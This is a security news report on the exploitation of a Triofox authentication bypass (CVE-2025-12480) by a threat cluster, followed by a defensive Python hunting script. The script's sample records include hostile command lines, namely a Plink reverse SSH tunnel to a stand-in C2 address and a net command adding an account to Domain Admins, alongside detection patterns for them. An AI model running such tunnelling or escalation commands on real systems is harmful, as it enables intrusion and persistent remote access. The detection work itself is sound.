Google’s Mandiant Threat Defense on Monday reported active exploitation of a now-patched security vulnerability in Gladinet’s Triofox file-sharing and remote access software. The flaw, tracked as CVE-2025-12480 and carrying a critical CVSS score of 9.1, allowed an unauthenticated attacker to bypass authentication and reach the platform’s initial configuration pages.
That access was then used to upload and execute malicious payloads. Google attributed the activity to a threat cluster it tracks as UNC6485, which had been exploiting the vulnerability since at least August 24, 2025, roughly a month after Gladinet shipped a fix in version 16.7.10368.56560. CVE-2025-12480 is the third Triofox flaw to be exploited in the wild this year, following CVE-2025-30406 and CVE-2025-11371.
The patch hardens the initial configuration pages; the release notes state, “These pages can no longer be accessed after Triofox has been set up.” According to Mandiant, the attackers used the unauthenticated access to reach those pages and re-run the setup process, creating a new native administrative account named “Cluster Admin.”
That high-privilege account was then used for follow-on activity. To gain code execution, the attackers logged in as the new admin, uploaded malicious files, and had them executed through Triofox’s built-in antivirus feature. The antivirus settings accept an arbitrary path for the scanner executable, and whatever file is configured there is launched by the Triofox parent process, which runs as SYSTEM. Mandiant reports that the attackers pointed the antivirus engine path at a malicious batch script named “centre_report.bat.”
The script connected to an external IP address (84.200.80[.]252, defanged) and downloaded an installer for Zoho Unified Endpoint Management System (UEMS), which was then used to push the remote access tools Zoho Assist and AnyDesk onto the compromised host. Through Zoho Assist the attackers carried out internal reconnaissance, then attempted to escalate privileges by changing the passwords of existing accounts and adding those accounts to the local Administrators group and to the “Domain Admins” group.
For persistence and evasion, the attackers also downloaded the legitimate tools Plink and PuTTY and used them to open an encrypted SSH tunnel to a command-and-control (C2) server over port 433, with the aim of forwarding inbound Remote Desktop Protocol (RDP) traffic to the host through the tunnel. The motive behind the campaign is not yet clear. Triofox users are urged to update to the latest version, audit all administrator accounts (including any unexpected “Cluster Admin” account), and verify that the antivirus feature is not configured to run any unauthorized script or binary.
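The intrusion chain described above lends itself to a small hunting check. The Python below is an added example written for this page; it is not Mandiant’s, Gladinet’s or Triofox’s code. It runs three heuristics over constructed process-creation records (loosely modelled on Sysmon event 1 fields) covering the antivirus-path abuse, the Plink tunnel and the group membership change, and adds a check for a suspicious antivirus scanner path. The Triofox process name TriofoxServer.exe, the C2 address 203.0.113.10, the script location under C:\Windows\Temp, the account names and the record field names are assumptions for illustration; only centre_report.bat, port 433, Plink and the Domain Admins target come from the report.

```python
"""Hunting heuristics for the Triofox/UNC6485 chain (added example, not vendor code)."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

SCRIPT_EXTENSIONS = {".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta"}
# Locations a low-privileged user can usually write to; a vendor AV engine should not live here.
WRITABLE_DIR_MARKERS = ("\\windows\\temp\\", "\\users\\", "\\programdata\\", "\\appdata\\")
PRIVILEGED_GROUPS = ("domain admins", "administrators", "enterprise admins")
SCRIPT_HOSTS = ("cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe")
SSH_CLIENTS = ("plink.exe", "putty.exe", "ssh.exe")

# "-R/-L/-D <spec>" port forwarding, and "-P 433" or ":433" (the port named in the report)
TUNNEL_RE = re.compile(r"(?:^|\s)-(?:R|L|D)\s*\S+")
PORT_433_RE = re.compile(r"(?:-P\s+|:)433(?:\s|$)")
GROUP_ADD_RE = re.compile(r'(?:local)?group\s+"?([^"]+?)"?\s+\S+\s+/add', re.IGNORECASE)


@dataclass
class ProcEvent:
    """Assumed process-creation record layout (field names are not from the article)."""
    parent_image: str
    image: str
    command_line: str
    user: str


def _image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def scanner_path_is_suspicious(path: str) -> bool:
    """Configured AV engine path is a script, or lives in a user-writable directory."""
    p = PureWindowsPath(path)
    if p.suffix.lower() in SCRIPT_EXTENSIONS:
        return True
    return any(marker in str(p).lower() for marker in WRITABLE_DIR_MARKERS)


def triofox_spawned_script(ev: ProcEvent) -> bool:
    """Triofox, running as SYSTEM, launched a script host with a script or a script file directly."""
    if "triofox" not in ev.parent_image.lower() or "system" not in ev.user.lower():
        return False
    if _image_name(ev.image) in SCRIPT_HOSTS:
        return any(ext in ev.command_line.lower() for ext in SCRIPT_EXTENSIONS)
    return PureWindowsPath(ev.image).suffix.lower() in SCRIPT_EXTENSIONS


def ssh_tunnel_to_c2(ev: ProcEvent) -> bool:
    """An SSH client opening a port forward, or any SSH client talking to port 433."""
    if _image_name(ev.image) not in SSH_CLIENTS:
        return False
    return bool(TUNNEL_RE.search(ev.command_line) or PORT_433_RE.search(ev.command_line))


def privileged_group_add(ev: ProcEvent) -> bool:
    """net.exe adding an account to a high-privilege local or domain group."""
    if _image_name(ev.image) not in ("net.exe", "net1.exe"):
        return False
    m = GROUP_ADD_RE.search(ev.command_line)
    return bool(m) and m.group(1).strip().lower() in PRIVILEGED_GROUPS


RULES = {
    "triofox_spawned_script": triofox_spawned_script,
    "ssh_tunnel_to_c2": ssh_tunnel_to_c2,
    "privileged_group_add": privileged_group_add,
}


def triage(events):
    """Return (rule_name, event) pairs for every rule that fires on every event."""
    return [(name, ev) for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed sample records; paths, hostnames, accounts and the C2 address are made up.
SAMPLE_EVENTS = [
    # AV path abuse: Triofox (SYSTEM) runs the attacker's batch file via cmd.exe.
    ProcEvent(r"C:\Triofox\TriofoxServer.exe", r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Windows\Temp\centre_report.bat"', r"NT AUTHORITY\SYSTEM"),
    # A real scanner binary launched from the same parent: not flagged.
    ProcEvent(r"C:\Triofox\TriofoxServer.exe", r"C:\Program Files\Windows Defender\MpCmdRun.exe",
              r'MpCmdRun.exe -Scan -ScanType 3 -File "C:\Triofox\uploads\report.docx"',
              r"NT AUTHORITY\SYSTEM"),
    # Reverse tunnel so the C2 host can reach RDP on this machine, over port 433.
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Users\Public\plink.exe",
              "plink.exe -N -R 3389:127.0.0.1:3389 -P 433 tunnel@203.0.113.10", r"CORP\svc_backup"),
    # Escalation: existing account added to Domain Admins.
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe",
              'net group "Domain Admins" svc_backup /add /domain', r"CORP\svc_backup"),
    # Routine service start: not flagged.
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs -p", r"NT AUTHORITY\SYSTEM"),
]

if __name__ == "__main__":
    for name, ev in triage(SAMPLE_EVENTS):
        print(f"[{name}] {ev.user}: {ev.command_line}")
    print("AV path check:", scanner_path_is_suspicious(r"C:\Windows\Temp\centre_report.bat"))
```

The scanner-path check is deliberately coarse: the article does not say where Triofox stores the antivirus engine setting, so feed it whatever path your own configuration review yields. Expect the Plink rule to also fire on legitimate administrators who forward ports; the value is in correlating it with the Triofox-spawned script and the group change on the same host.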